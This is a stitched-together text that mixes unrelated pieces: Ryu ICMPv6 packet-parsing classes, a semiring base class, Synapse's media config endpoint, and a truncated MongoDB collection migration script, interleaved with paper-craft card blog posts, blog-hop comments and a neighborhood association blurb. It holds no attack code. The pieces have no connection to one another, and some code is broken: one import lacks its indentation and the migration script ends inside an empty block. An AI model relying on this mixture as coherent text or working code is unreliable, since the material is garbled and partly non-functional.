    _ICMPV6_TYPES = {}

    @staticmethod
    def register_icmpv6_type(*args):
        # Class decorator: register `cls` as the payload decoder for each of
        # the given ICMPv6 type values.
        def _register_icmpv6_type(cls):
            for type_ in args:
                icmpv6._ICMPV6_TYPES[type_] = cls
            return cls
        return _register_icmpv6_type

    def __init__(self, type_, code, csum, data=None):
        super(icmpv6, self).__init__()
        self.type_ = type_
        self.code = code
        self.csum = csum
        self.data = data

    @classmethod
    def parser(cls, buf):
        (type_, code, csum) = struct.unpack_from(cls._PACK_STR, buf)
        msg = cls(type_, code, csum)
        offset = cls._MIN_LEN
        if len(buf) > offset:
            # Decode the body with the registered sub-decoder when one is
            # known for this type; otherwise keep the raw trailing bytes.
            cls_ = cls._ICMPV6_TYPES.get(type_, None)
            if cls_:
                msg.data = cls_.parser(buf, offset)
            else:
                msg.data = buf[offset:]
        # The trailing Nones fill the remaining slots of the PacketBase
        # parser contract (presumably next-protocol class and leftover
        # data -- confirm against packet_base.PacketBase).
        return msg, None, None

    def serialize(self, payload, prev):
        hdr = bytearray(struct.pack(icmpv6._PACK_STR, self.type_,
                                    self.code, self.csum))
        if self.data is not None:
            # Registered payload objects serialize themselves; anything
            # else is appended as raw bytes.
            if self.type_ in icmpv6._ICMPV6_TYPES:
                hdr += self.data.serialize()
            else:
                hdr += self.data
        if self.csum == 0:
            # csum == 0 requests automatic checksumming over `prev` (the
            # preceding header, used as pseudo-header input) plus this
            # message and its payload; the result is written back into both
            # the attribute and the already-encoded header bytes.
            self.csum = packet_utils.checksum_ip(prev, len(hdr), hdr + payload)
            struct.pack_into('!H', hdr, 2, self.csum)
        return hdr
@icmpv6.register_icmpv6_type(ND_NEIGHBOR_SOLICIT, ND_NEIGHBOR_ADVERT)
class nd_neighbor(stringify.StringifyMixin):
    """ICMPv6 sub encoder/decoder class for Neighbor Solicitation and
    Neighbor Advertisement messages. (RFC 4861)

    This is used with ryu.lib.packet.icmpv6.icmpv6.

    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the correspondig args in this order.

    .. tabularcolumns:: |l|p{35em}|

    ============== ====================
    Attribute      Description
    ============== ====================
    res            R,S,O Flags for Neighbor Advertisement. \
                   The 3 MSBs of "Reserved" field for Neighbor Solicitation.
    dst            Target Address
    type\_         "Type" field of the first option. None if no options. \
                   NOTE: This implementation doesn't support two or more \
                   options.
    length         "Length" field of the first option. None if no options.
    data           An object to describe the first option. \
                   None if no options. \
                   Either ryu.lib.packet.icmpv6.nd_option_la object \
                   or a bytearray.
    ============== ====================
    """

    # Fixed part: 4-octet reserved/flags word, then the 16-octet target
    # address.
    _PACK_STR = '!I16s'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    # Maps ND option type values to the option decoder registered for them.
    _ND_OPTION_TYPES = {}

    # ND option type
    ND_OPTION_SLA = 1  # Source Link-Layer Address
    ND_OPTION_TLA = 2  # Target Link-Layer Address
    ND_OPTION_PI = 3   # Prefix Information
    ND_OPTION_RH = 4   # Redirected Header
    ND_OPTION_MTU = 5  # MTU

    @staticmethod
    def register_nd_option_type(*args):
        # Class decorator: register `cls` as the decoder for the given ND
        # option type values.
        def _register_nd_option_type(cls):
            for type_ in args:
                nd_neighbor._ND_OPTION_TYPES[type_] = cls
            return cls
        return _register_nd_option_type

    def __init__(self, res, dst, type_=None, length=None, data=None):
        # Callers pass the flag bits right-aligned; on the wire they occupy
        # the 3 most significant bits of the 32-bit word, so the shifted
        # form is stored and serialized as-is.
        self.res = res << 29
        self.dst = dst
        self.type_ = type_
        self.length = length
        self.data = data

    @classmethod
    def parser(cls, buf, offset):
        (res, dst) = struct.unpack_from(cls._PACK_STR, buf, offset)
        # Undo the on-wire alignment (see __init__) before handing the flag
        # bits to the constructor, which re-applies the shift.
        msg = cls(res >> 29, addrconv.ipv6.bin_to_text(dst))
        offset += cls._MIN_LEN
        if len(buf) > offset:
            # At most one trailing option is decoded (see class docstring).
            (msg.type_, msg.length) = struct.unpack_from('!BB', buf, offset)
            cls_ = cls._ND_OPTION_TYPES.get(msg.type_, None)
            offset += 2
            if cls_:
                msg.data = cls_.parser(buf, offset)
            else:
                msg.data = buf[offset:]
        return msg

    def serialize(self):
        # self.res already holds the flags in wire position (see __init__).
        hdr = bytearray(struct.pack(nd_neighbor._PACK_STR, self.res,
                                    addrconv.ipv6.text_to_bin(self.dst)))
        if self.type_ is not None:
            hdr += bytearray(struct.pack('!BB', self.type_, self.length))
            if self.type_ in nd_neighbor._ND_OPTION_TYPES:
                hdr += self.data.serialize()
            elif self.data is not None:
                hdr += bytearray(self.data)
        return hdr
@icmpv6.register_icmpv6_type(ND_ROUTER_SOLICIT)
class nd_router_solicit(stringify.StringifyMixin):
    """ICMPv6 sub encoder/decoder class for Router Solicitation messages.
    (RFC 4861)

    This is used with ryu.lib.packet.icmpv6.icmpv6.

    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the correspondig args in this order.

    .. tabularcolumns:: |l|p{35em}|

    ============== ====================
    Attribute      Description
    ============== ====================
    res            This field is unused. It MUST be initialized to zero.
    type\_         "Type" field of the first option. None if no options. \
                   NOTE: This implementation doesn't support two or more \
                   options.
    length         "Length" field of the first option. None if no options.
    data           An object to describe the first option. \
                   None if no options. \
                   Either ryu.lib.packet.icmpv6.nd_option_la object \
                   or a bytearray.
    ============== ====================
    """

    # Fixed part: a single 32-bit reserved word.
    _PACK_STR = '!I'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    # Maps ND option type values to the option decoder registered for them.
    _ND_OPTION_TYPES = {}

    # ND option type
    ND_OPTION_SLA = 1  # Source Link-Layer Address

    @staticmethod
    def register_nd_option_type(*args):
        # Class decorator: register `cls` as the decoder for the given ND
        # option type values.
        def _register_nd_option_type(cls):
            for type_ in args:
                nd_router_solicit._ND_OPTION_TYPES[type_] = cls
            return cls
        return _register_nd_option_type

    def __init__(self, res, type_=None, length=None, data=None):
        self.res = res
        self.type_ = type_
        self.length = length
        self.data = data

    @classmethod
    def parser(cls, buf, offset):
        # BUG FIX: struct.unpack_from() always returns a tuple; the single
        # reserved word must be unpacked from it.  Previously the bare
        # tuple itself was stored as `res`, which made serialize() fail
        # when packing it back into the header (every sibling class here
        # already unpacks with `(x, ) = ...`).
        (res, ) = struct.unpack_from(cls._PACK_STR, buf, offset)
        msg = cls(res)
        offset += cls._MIN_LEN
        if len(buf) > offset:
            # At most one trailing option is decoded (see class docstring).
            (msg.type_, msg.length) = struct.unpack_from('!BB', buf, offset)
            cls_ = cls._ND_OPTION_TYPES.get(msg.type_, None)
            offset += 2
            if cls_:
                msg.data = cls_.parser(buf, offset)
            else:
                msg.data = buf[offset:]
        return msg

    def serialize(self):
        hdr = bytearray(struct.pack(nd_router_solicit._PACK_STR, self.res))
        if self.type_ is not None:
            hdr += bytearray(struct.pack('!BB', self.type_, self.length))
            if self.type_ in nd_router_solicit._ND_OPTION_TYPES:
                hdr += self.data.serialize()
            elif self.data is not None:
                hdr += bytearray(self.data)
        return hdr
@icmpv6.register_icmpv6_type(ND_ROUTER_ADVERT)
class nd_router_advert(stringify.StringifyMixin):
    """ICMPv6 sub encoder/decoder class for Router Advertisement messages.
    (RFC 4861)

    This is used with ryu.lib.packet.icmpv6.icmpv6.

    An instance has the following attributes at least.
    Most of them are same to the on-wire counterparts but in host byte order.
    __init__ takes the correspondig args in this order.

    .. tabularcolumns:: |l|p{35em}|

    ============== ====================
    Attribute      Description
    ============== ====================
    ch_l           Cur Hop Limit.
    res            M,O Flags for Router Advertisement.
    rou_l          Router Lifetime.
    rea_t          Reachable Time.
    ret_t          Retrans Timer.
    type\_         List of option type. Each index refers to an option. \
                   None if no options. \
                   NOTE: This implementation support one or more \
                   options.
    length         List of option length. Each index refers to an option. \
                   None if no options.
    data           List of option data. Each index refers to an option. \
                   None if no options. \
                   ryu.lib.packet.icmpv6.nd_option_la object, \
                   ryu.lib.packet.icmpv6.nd_option_pi object \
                   or a bytearray.
    ============== ====================
    """

    # Fixed part: hop limit, flags octet, router lifetime, reachable time,
    # retrans timer.
    _PACK_STR = '!BBHII'
    _MIN_LEN = struct.calcsize(_PACK_STR)
    # Maps ND option type values to the option decoder registered for them.
    _ND_OPTION_TYPES = {}

    # ND option type
    ND_OPTION_SLA = 1  # Source Link-Layer Address
    ND_OPTION_PI = 3   # Prefix Information
    ND_OPTION_MTU = 5  # MTU

    @staticmethod
    def register_nd_option_type(*args):
        # Class decorator: register `cls` as the decoder for the given ND
        # option type values.
        def _register_nd_option_type(cls):
            for type_ in args:
                nd_router_advert._ND_OPTION_TYPES[type_] = cls
            return cls
        return _register_nd_option_type

    def __init__(self, ch_l, res, rou_l, rea_t, ret_t, type_=None, length=None,
                 data=None):
        self.ch_l = ch_l
        # Callers pass the M,O flags right-aligned; on the wire they are
        # the 2 most significant bits of the flags octet, hence the shift.
        self.res = res << 6
        self.rou_l = rou_l
        self.rea_t = rea_t
        self.ret_t = ret_t
        self.type_ = type_
        self.length = length
        self.data = data

    @classmethod
    def parser(cls, buf, offset):
        (ch_l, res, rou_l, rea_t, ret_t) = struct.unpack_from(cls._PACK_STR,
                                                              buf, offset)
        # Undo the on-wire flag alignment before calling the constructor,
        # which re-applies the shift.
        msg = cls(ch_l, res >> 6, rou_l, rea_t, ret_t)
        offset += cls._MIN_LEN
        msg.type_ = list()
        msg.length = list()
        msg.data = list()
        # Scan trailing options; the parallel lists type_/length/data share
        # one index per option.
        while len(buf) > offset:
            (type_, length) = struct.unpack_from('!BB', buf, offset)
            msg.type_.append(type_)
            msg.length.append(length)
            cls_ = cls._ND_OPTION_TYPES.get(type_, None)
            offset += 2
            if cls_:
                # NOTE(review): the option body is assumed to span exactly
                # cls_._MIN_LEN bytes, ignoring the option's own `length`
                # field (units of 8 octets per RFC 4861); options longer
                # than their minimum size would be misparsed -- confirm
                # this is acceptable for the registered options.
                msg.data.append(cls_.parser(buf[:offset+cls_._MIN_LEN],
                                            offset))
                offset += cls_._MIN_LEN
            else:
                # Unknown option: keep everything left as raw bytes, stop.
                msg.data.append(buf[offset:])
                offset = len(buf)
        return msg

    def serialize(self):
        # self.res already holds the flags in wire position (see __init__).
        hdr = bytearray(struct.pack(nd_router_advert._PACK_STR, self.ch_l,
                                    self.res, self.rou_l, self.rea_t,
                                    self.ret_t))
        if self.type_ is not None:
            for i in range(len(self.type_)):
                hdr += bytearray(struct.pack('!BB', self.type_[i],
                                             self.length[i]))
                if self.type_[i] in nd_router_advert._ND_OPTION_TYPES:
                    hdr += self.data[i].serialize()
                elif self.data[i] is not None:
                    hdr += bytearray(self.data[i])
        return hdr
@nd_neighbor.register_nd_option_type(nd_neighbor.ND_OPTION_SLA,
                                     nd_neighbor.ND_OPTION_TLA)
@nd_router_solicit.register_nd_option_type(nd_router_solicit.ND_OPTION_SLA)
@nd_router_advert.register_nd_option_type(nd_router_advert.ND_OPTION_SLA)
class nd_option_la(stringify.StringifyMixin):
    """ICMPv6 sub encoder/decoder for the Neighbor Discovery Source/Target
    Link-Layer Address option. (RFC 4861)

    Used together with ryu.lib.packet.icmpv6.nd_neighbor,
    ryu.lib.packet.icmpv6.nd_router_solicit or
    ryu.lib.packet.icmpv6.nd_router_advert.  Values are kept in host byte
    order; __init__ takes them in the order listed.

    ============== ====================
    Attribute      Description
    ============== ====================
    hw_src         Link-Layer Address. \
                   NOTE: for addresses longer than 6 octets only the first \
                   6 octets are held here; at least 6 octets are assumed.
    data           A bytearray holding the remainder of the Link-Layer \
                   Address plus padding.  When encoding, the caller must \
                   supply the padding needed for the protocol's 8-octet \
                   alignment.
    ============== ====================
    """

    # The first 6 octets of the link-layer address.
    _PACK_STR = '!6s'
    _MIN_LEN = struct.calcsize(_PACK_STR)

    def __init__(self, hw_src, data=None):
        self.hw_src = hw_src
        self.data = data

    @classmethod
    def parser(cls, buf, offset):
        (hw_src, ) = struct.unpack_from(cls._PACK_STR, buf, offset)
        option = cls(addrconv.mac.bin_to_text(hw_src))
        rest = offset + cls._MIN_LEN
        if rest < len(buf):
            option.data = buf[rest:]
        return option

    def serialize(self):
        wire = bytearray(struct.pack(self._PACK_STR,
                                     addrconv.mac.text_to_bin(self.hw_src)))
        if self.data is not None:
            wire += bytearray(self.data)
        return wire
@nd_router_advert.register_nd_option_type(nd_router_advert.ND_OPTION_PI)
class nd_option_pi(stringify.StringifyMixin):
    """ICMPv6 sub encoder/decoder for the Neighbor Discovery Prefix
    Information option. (RFC 4861)

    Used together with ryu.lib.packet.icmpv6.nd_router_advert.  Values are
    kept in host byte order; __init__ takes them in the order listed.

    ============== ====================
    Attribute      Description
    ============== ====================
    pl             Prefix Length.
    res1           L,A,R\* Flags for Prefix Information.
    val_l          Valid Lifetime.
    pre_l          Preferred Lifetime.
    res2           This field is unused. It MUST be initialized to zero.
    prefix         An IP address or a prefix of an IP address.
    ============== ====================

    \*R flag is defined in (RFC 3775)
    """

    _PACK_STR = '!BBIII16s'
    _MIN_LEN = struct.calcsize(_PACK_STR)

    def __init__(self, pl, res1, val_l, pre_l, res2, prefix):
        self.pl = pl
        # On the wire the flags occupy the top 3 bits of the second octet.
        self.res1 = res1 << 5
        self.val_l = val_l
        self.pre_l = pre_l
        self.res2 = res2
        self.prefix = prefix

    @classmethod
    def parser(cls, buf, offset):
        fields = struct.unpack_from(cls._PACK_STR, buf, offset)
        pl, res1, val_l, pre_l, res2, prefix = fields
        # Right-align the flag bits for the constructor, which re-shifts.
        return cls(pl, res1 >> 5, val_l, pre_l, res2,
                   addrconv.ipv6.bin_to_text(prefix))

    def serialize(self):
        return bytearray(struct.pack(self._PACK_STR, self.pl, self.res1,
                                     self.val_l, self.pre_l, self.res2,
                                     addrconv.ipv6.text_to_bin(self.prefix)))
@icmpv6.register_icmpv6_type(ICMPV6_ECHO_REPLY, ICMPV6_ECHO_REQUEST)
class echo(stringify.StringifyMixin):
    """ICMPv6 sub encoder/decoder for Echo Request and Echo Reply bodies.

    Used together with ryu.lib.packet.icmpv6.icmpv6 for ICMPv6 Echo
    Request and Echo Reply messages.  Values are kept in host byte order;
    __init__ takes them in the order listed.

    ============== ====================
    Attribute      Description
    ============== ====================
    id             Identifier
    seq            Sequence Number
    data           Data
    ============== ====================
    """

    # Identifier and sequence number, both 16-bit big-endian.
    _PACK_STR = '!HH'
    _MIN_LEN = struct.calcsize(_PACK_STR)

    def __init__(self, id_, seq, data=None):
        self.id = id_
        self.seq = seq
        self.data = data

    @classmethod
    def parser(cls, buf, offset):
        id_, seq = struct.unpack_from(cls._PACK_STR, buf, offset)
        msg = cls(id_, seq)
        body_start = offset + cls._MIN_LEN
        if body_start < len(buf):
            msg.data = buf[body_start:]
        return msg

    def serialize(self):
        wire = bytearray(struct.pack(self._PACK_STR, self.id, self.seq))
        if self.data is not None:
            wire += bytearray(self.data)
        return wire
|
I made the following cards for One Layer Wednesday challenge 51. The challenge this week is to make 3 one layer cards using the same image on 3 separate cards, 3 different ways.
I used a stamp from Papertrey Ink and sentiments from Hero Arts. The first one's stems are stamped in black , the flowers with red , adding black shimmery stick on dots to the flower's centers and ribbon. The second is stamped with brown stems and versamark for the flowers then embossed in white, the sentiment in brown and blue shimmery stick on dots and ribbon. The stems on the third are stamped with old olive, and the flowers with yellow the sentiment in brown and brown shimmery stick on dots and ribbon. I was going to stamp the middles into the flowers, but these dots fit PERFECTLY and made me feel happy(I'm all about the happy!!)...and when I finished...I thought that a ribbon at the top was needed...the flowers and sentiment looked a little lonely. I know that we are supposed to keep embellishments to a minimum, but they are one layer, and in the end...being that I"m all about the happy...I'm happy.
What a fun challenge, and quick and simple...and now I've got 3 new cards instead of 1...thanks, Jennifer:)!!
Thanks for looking, hope you have a glorious day!!
The challenge was yesterday...I ran out of yesterday before I got to this, but DID get to it:)!! The main panel was long, so I opted for a longer image, and this set from A Muse was a perfect fit(well, I cut the bottoms of the trees off)...I loved its long look! I stamped in black and dotted with 2 shades of pink rhinestones. Used a background stamp from Papertrey Ink for the panel behind the trees...stamped in versamark and clear embossed. Used 3 medium sized black brads and framed everything on black card. Super simple...but I DID love this sketch, even though I found those 3 circles a bit intimidating...conquered!!
I chose the square and decided to make a Mother's Day card (I'm going to send my mom a few this year:)!!). I thought the set Because of You had wonderful sentiments, so decided to use that for my card. I spied the stems in the set that looked like grape hyacinths...sweet flowers...so I used them behind my sentiment and decided then, that my card would have a purple flavor. I used Stampin Up flower and border punches and embossing folder for the back panel. Had a piece of Bazzill polka dotted embossed paper and some Enamel accents for the white dots. A great sketch...thanks for taking a look:)!!
I made this card for Case Study Challenge 36, found HERE .
I chose to keep the layout...did my out-of-the-box on the other side with a totally different set of images and colors(the colors are kinda "out there" for me...hmm:)!!). I colored the flowers with Prismacolor pencils and used baby oil. I popped up the layers, added ribbon , button, sentiment and pearls.
Thanks for looking, hope your Monday is marvelous!!
Ever have an evolution card? One that started out with an entirely different thought, for an entirely different challenge, and it "evolved" into something TOTALLY DIFFERENT? This was THAT kind of card!!
I found the simple scalloped circle very intriguing...and thought....what if I cut in between the scallops and made a crazy daisy??? So that's what I did. I cut into the center of the circle...not too far and definitely not perfectly(no matter, the brad covers the imperfections)...just always look to the center when cutting, otherwise your cuts will go sideways a bit...well, mine did:)!! I also used a die for the leaves made by QuicKutz that I purchased from Amazon.com some time ago when looking for leaves and vines. The die is 12" long, but I use it to the length and sections that I want. I ran it through once in yellow, and once in black and filled in the black vine with the yellow vine's leaves. I added sentiment and a rhinestone to dot the "i" .
I made this card for the One Layer Wednesday challenge #50...to make a one layer card with an old stamp and make it a thank you card. The challenge can be found HERE .
Did that all the way around, added rhinestones, scored lines at the bottom and added ribbon...I know...a bit heavy with the embellishments...but I thought they really "fit"...and weren't too heavy??!!:)!
This is the first card I made...had it done, and then realized that the challenge was a Thank you card....so made another with a bit larger sentiment stamp.
Being this was my first one, I think it's a little "off", I learned so many little things as I went... but it's ok. Somewhere I read, recently said that the flaws are what make our cards handmade...so a little "off" is ok.
Thanks so much for looking...hope your day is filled with inspiration:)!!
I already had a few stamped images, so all I had to do was color and cut. I used Prismacolor pencils and baby oil, two each color of red, green and silver/gray...I don't color often, but I must admit, it can be fun and very relaxing:)!!
I had a piece of gray designer paper, and red SU textured cardstock and added piercing to the top and bottom. I used a sentiment from Verve and added ribbon and top of brad to bow. Popped up both panels. I thought to "add" more, but opted to keep it somewhat simple.
Oh, I just LOVE these layouts:)!!!
Thanks for looking, I hope you have a wonderful day:)!!
I made this card for Clean and Simple's FTL136 sketch, found HERE .
I haven't been to Mike's (Michael's) too much, of late, but had a coupon and a day to "flit" and bought this book of design paper. I am not one who uses a lot of design paper, but every once in a while I do, and LOVE to have dp that I LOVE! I thought, unlike a lot of design papers, this would be GREAT for cards(the patterns were smaller and closer together),and... I LOVED the colors AND the designs!!!
So....the card was super simple...the only hard part, deciding on which papers. The bermuda bay colored paper actually has circular designs on it...it's very faint, but not plain. Natasha on Clean and Simple's Blog, had used a ribbon as one of the panels...it worked on my card...thanks for the inspiration:)!! I used another new set from Papertrey Ink...a set of frames, to put the sentiment on. I added a PTI button with a white stick on dot placed in the middle making it not look so much like a button.
I used a new stamp I got from Papertrey Ink(thanks Mom:)!!) which stamps a gingham pattern and a flower from another PTI set. The doily design is a die from PTI, as well. It was a little tough figuring out how to make it work...the first couple times I used it, it didn't cut the paper too well. I put an extra piece of packaging paper(really thick) behind the cutting part of the die, and it worked like a charm! I struggled with the sentiment...tried a bunch, but settled on a simple "hello"...I thought it just fit:)!! I know I may be in the minority...but I was sad when Taken with Teal was Taken Away...I LOVE teal!! Oh well....I bought a bit before they stopped making it:)!!
Now, I'll be right in time for the next Clean and Simple sketch....YEAH!!
I have been out all day working in the yard...cleaning up and cleaning out my yard...whew...it has been A LOT of work!!! I made this card early this morning for One Layer Wednesday, this week hosted by Jennifer Styles, her blog and the challenge found HERE The challenge this week is to make a one layer card with green and pink and a stamp that has never seen ink! I hate to admit...I had a lot of choices:)!!
So after I put the card in the embossing folder, I put the frame over the image and sentiment and embossed with one less acrylic plate(I have a Big Shot). I then took my Martha Stewart scoring board and scored a frame around the image and sentiment. I goofed with putting the frame a little too close to the flower...but it will have to do:)!! I added 2 rhinestones in the centers of the 2 open flowers and done!!
Thanks for taking a look...I hope you have a wonderful day:)!!
This is a close up on the diamond glazed middles.
I decided on a daisy bouquet by Gina K Designs and after stamping it, decided to try the clean and simple look and style of Silke, once again(it's addictive:)!!). By that I mean the simple layering and the use of silver pearls that she is known for...but it DID just feel right with this stamp and this card. This will be my mom's card for Mother's Day....she LOVES daisies!
The small circle did not afford the opportunity for a large sentiment, so I masked each word, and stamped them vertical. I started with the word "mother's" first, making sure it was kinda centered, and then stamped the other two...just a thought.
Used a piece of Bazzill embossed paper from Mikes, and a striped embossing folder for the yellow.
Thanks for taking a look, I hope you have a wonderful day:)!!
This is the first time I have pierced this much...before maybe a corner, but decided to take it all the way around the panel. I added a border piece on the bottom and added silver pearls. The rest is pretty simple...and with the butterfly...I had black 26 gauge wire and wound it around the body of the 2 butterflies and twisted it once at the top, and cut and sort of curled the antennae. Now THIS is more me:):)!! Just goes to show you that you CAN make a cleaner card, no matter how many elements or layers are in the sketch:)!! Thanks Silke for the wonderful inspiration your cards bring to me:)!!!!
Thanks for taking a look...I hope your day is filled with wonder!!
I changed the color, the border, the sentiment, and the embellishments, but I LOVED the images and layout...so I kept that all the same! I LOVE how she doesn't have to frame each panel, pops it up, and it looks beautiful...sooooo cool!!
I used Papertrey butterfly dies, and then the stamps, colored with old SU markers and layered. I used the SU border punch, and the black dots are Enamel Accents(I use them ALOT!).
I am looking forward to the rest of the month...but I doubt I'll veer too far from her work...it's my chance to have Silke's cards for my own:)!!
Thanks for looking, I hope you have a great weekend!!!
I used one of my favorite butterfly stamps, from Gina K Designs, and inked the stamp with Sahara Sand. I stamped the butterfly on scrap paper each time I stamped, to get a lighter image. I then stamped the sentiment over the 3 butterflies with Early Espresso and embossed. I added 3 scored lines on both sides, and that's it. I thought that when I started this, it would take a long time...it only took minutes...fast and easy!! Now, it's on to another challenge!!
I embossed the white paper, traced the oval and cut it out. I suppose you could use a nestie to cut the hole, as well, but I embossed first, so I hand cut the oval:)!! I used an oval nestie and a scalloped one a couple sizes bigger for the frame. Stamped the flower and stems using a stamp a ma jig for positioning and used it for the sentiment, as well. I like the textured look of Bazzill paper, so I used the back side of a piece of bazzill white for the flowers, so the whites matched. Attached the white panel of flowers directly to the blushing bride card, and popped up the embossed and framed piece.
Thanks for looking...hope you have a fantastic day!!
I stamped the flower from Unity Stamps twice in cool caribbean and once in so saffron. I cut them out and popped them up. Made two strips of so saffron and one of cool caribbean using a polka dotted embossing folder on the blue. LOVE these colors, too!
I am trying to pull out old stamps...well old is relative...this Helen Keller quote stamp is less than a year old...but I hate to admit it, I've NEVER used it. I stamped a stamp from A Muse(I inked and stamped on white two times....each time stamping once lightly on a scrap piece of paper to get a lighter color on my card) with certainly celery and then stamped the quote over it with early espresso. I found a piece of SU designer paper and embossed a piece of certainly celery with a heart embossing folder. I used this punch, below, to get the hearts, and glued them on with a glue stick.
Popped up the flowers and added $1 rhinestones from Mike's, then popped up the black panel. The sentiment is stamped in versamark and embossed with white embossing powder.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012 - Seweryn Dynerowicz, FUNDP.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Semiring:
    """Abstract base class for elements of a semiring.

    Subclasses supply the two distinguished constants (``zeroElt`` and
    ``unitElt``) and override the abstract operators below.  Each instance
    wraps a single underlying value in ``self.elt``.
    """

    # Distinguished constants of the semiring; subclasses must override.
    zeroElt = None
    unitElt = None

    def __init__(self, val):
        # The underlying value this semiring element wraps.
        self.elt = val

    # ----- semiring laws (abstract; subclasses must implement) -----
    def __add__(self, other):
        raise NotImplementedError("Additive law not implemented.")

    def __mul__(self, other):
        raise NotImplementedError("Multiplicative law not implemented.")

    def __le__(self, other):
        # Canonical preorder: a <= b  iff  a + b == b (subclass-specific).
        raise NotImplementedError("Canonical preorder relation not specified.")

    # ----- comparisons derived from __le__ and __eq__ -----
    def __lt__(self, other):
        return self <= other and self != other

    def __ge__(self, other):
        return other <= self

    def __gt__(self, other):
        return other < self

    def __eq__(self, other):
        return self.elt == other.elt

    def __ne__(self, other):
        return not self.elt == other.elt

    # ----- representation (abstract) -----
    def __repr__(self):
        raise NotImplementedError("Representation not specified.")

    def __pow__(self, p):
        """Return self multiplied by itself p times (p == 0 gives the unit).

        Deliberately plain repeated multiplication, not square-and-multiply.
        """
        acc, remaining = self.unit(), p
        while remaining > 0:
            acc = acc * self
            remaining -= 1
        return acc

    def isZero(self):
        # True when the wrapped value equals the additive identity.
        return self.elt == self.zeroElt

    def isUnit(self):
        # True when the wrapped value equals the multiplicative identity.
        return self.elt == self.unitElt

    @classmethod
    def zero(cls):
        """Return the additive identity of this semiring."""
        return cls(cls.zeroElt)

    @classmethod
    def unit(cls):
        """Return the multiplicative identity of this semiring."""
        return cls(cls.unitElt)
|
Glen Meadow Neighborhood Association (GMNA) membership is voluntary — and IMPORTANT. Through your support, both financial & physical, your Neighborhood Association is able to accomplish great things for the neighborhood.
VIPs (Volunteers In Patrol): Year-round neighborhood patrol, ensuring personal safety & property protection.
Crime Watch: Monitors criminal activity & alerts us of trends so we can take precautions.
Beautification: Awards “Yard of the Month” and provides year-round maintenance of Glen Meadow Park grounds, gazebo, & equipment.
Social: Plans & hosts Events that help us get acquainted with our neighbors while we have fun.
|
# Copyright 2018 Will Hunt <will@half-shot.uk>
# Copyright 2020-2021 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import TYPE_CHECKING
from twisted.web.server import Request
from synapse.http.server import DirectServeJsonResource, respond_with_json
from synapse.http.site import SynapseRequest
if TYPE_CHECKING:
from synapse.server import HomeServer
class MediaConfigResource(DirectServeJsonResource):
    """Reports the media repository's client-visible limits.

    Serves a static JSON body whose only entry is the maximum upload
    size, to any authenticated client.
    """

    isLeaf = True

    def __init__(self, hs: "HomeServer"):
        super().__init__()
        self.auth = hs.get_auth()
        self.clock = hs.get_clock()
        # Static response payload: the only advertised limit is the upload cap.
        self.limits_dict = {"m.upload.size": hs.config.max_upload_size}

    async def _async_render_GET(self, request: SynapseRequest) -> None:
        # Any valid access token may read the config; the user is not used.
        await self.auth.get_user_by_req(request)
        respond_with_json(request, 200, self.limits_dict, send_cors=True)

    async def _async_render_OPTIONS(self, request: Request) -> None:
        # CORS preflight: unauthenticated, empty JSON body.
        respond_with_json(request, 200, {}, send_cors=True)
|
Today I am extremely happy to share with you that I am a part of Critter Sketch Blog Hop. This is my first blog hop and I am very much exited about it.
Winners of the Blog hop will win 3 prizes from our sponsors.
Cute card, I like what you did to the inside.
Wow what a georgous card. You did a wonderful job working with the sketch and image. Thank you for being a part of the 100th blog hop, it means a lot to me.
I love the metal sticker and the ribbon most. You did great job!
Very cute card. The image is so sweet and the paper is beautiful!!!
This is super cute! Love the image, the birds are really sweeties!
Very sweet card…wish I could make flowers like you do!
What a cute card! Love that you showed the inside as well as the out!
Sweet image and lovely color combo. Great job on the inside and out.
Beautiful card! Love the paper and that adorable image.
Happy 100th challenge at Critter Sketch Challenges!!!
|
#!/usr/bin/python
# Migrate CGRateS MongoDB collections between databases.
#
# depends:
#   ^ pymongo  # install via: easy_install pymongo (or pip install pymongo)
# behaviour:
#   ^ the script will "move" the collections (server-side renameCollection)
#     if source and target server are the same, but will "copy"
#     (mongodump/mongorestore) if source and target servers are different.

# --- Source server settings -------------------------------------------------
from_host = '127.0.0.1'
from_port = '27017'
from_db = '11'
from_auth_db = 'cgrates'  # Auth db on source server
from_user = 'cgrates'
from_pass = ''  # empty password disables authentication

# --- Target server settings -------------------------------------------------
to_host = '127.0.0.1'
to_port = '27017'
to_db = '10'
to_auth_db = "cgrates"  # Auth db on target server
to_user = 'cgrates'
to_pass = ''

# Do not migrate collections with 0 document count.
# Works only if from/to is on same host.
ignore_empty_cols = True

# Overwrite target collections flag.
# Works only if from/to is on same host.
# If from/to hosts are different we use mongorestore which overwrites by default.
drop_target = False

dump_folder = 'dump'

from pymongo import MongoClient
from collections import OrderedDict

# quote_plus moved to urllib.parse in Python 3; keep Python 2 compatibility.
try:
    from urllib.parse import quote_plus
except ImportError:
    from urllib import quote_plus

# same server: move collections with the server-side renameCollection command
if from_host == to_host and from_port == to_port:
    print('Migrating on same server...')
    # Quote both credentials so special characters survive in the URI.
    mongo_from_url = ('mongodb://' + quote_plus(from_user) + ':'
                      + quote_plus(from_pass) + '@' + from_host + ':'
                      + from_port + '/' + from_auth_db)
    if from_pass == '':  # disabled auth
        mongo_from_url = 'mongodb://' + from_host + ':' + from_port + '/' + from_db
    client = MongoClient(mongo_from_url)
    db = client[from_db]
    # list_collection_names() superseded collection_names() in pymongo 3.7;
    # fall back for older drivers.
    if hasattr(db, 'list_collection_names'):
        cols = db.list_collection_names()
    else:
        cols = db.collection_names()

    # collections found
    if len(cols) > 0:
